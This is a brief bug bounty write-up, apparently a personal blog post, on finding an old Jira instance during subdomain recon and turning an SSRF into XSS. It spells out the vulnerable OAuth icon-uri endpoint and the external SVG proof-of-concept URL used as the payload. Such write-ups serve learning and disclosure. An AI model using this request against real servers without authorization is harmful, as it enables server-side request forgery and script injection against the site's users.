How i converted SSRF TO XSS in jira.
I m very much into Bug Bounty and i spend my whole day doing this finding new and interesting stuff and kept on upgrading my recon techniques.
So this Site was random and has vast subdomains to test
domain *.example.com
so i used some sites to find subdomains
2. DnsDumpster
3. virustotal
Before i start Acunetix does Subdomain scans so just set the time out to 20 and you will get a really big list with banners and response headers. (it does the half of the work for you.)
Now, i been through lots of subdomains and i was specifically looking for any jira environment , and i found one.
lets say wiki.example.com
so i looked at the version and it was “5.8.13” ,which is affected to ssrf ……
I remember the “Alyssa Herrera” writeup on “Piercing the Veil: Server Side Request Forgery to NIPRNet access”
so i quickly visited
“plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”
And Boom i got the google page and i m like
So i followed the writeup but couldn’t managed to get any sensitive info .
[Yes i tried everything ..nothing worked.]
And that’s where i was like “why god?” why ?
and then suddenly it came to my mind and i went to brute xss blog
copied “http://brutelogic.com.br/poc.svg” , and put it place of https://google.com
and boom , i got XSS
So it worked and i got bounty of 50$ which is less (and that company sucks)
Anyways it doesn’t matter at all , it was all about exploration and learning new things and gain experience.
#sharing is #caring
Hope you guys enjoyed it and learned something new. #[For who doesn’t know ,rest are leets].
Thank you
./Logout
follow me on twitter: Ashish Kunwar
and if you have any questions DM is open only for followers.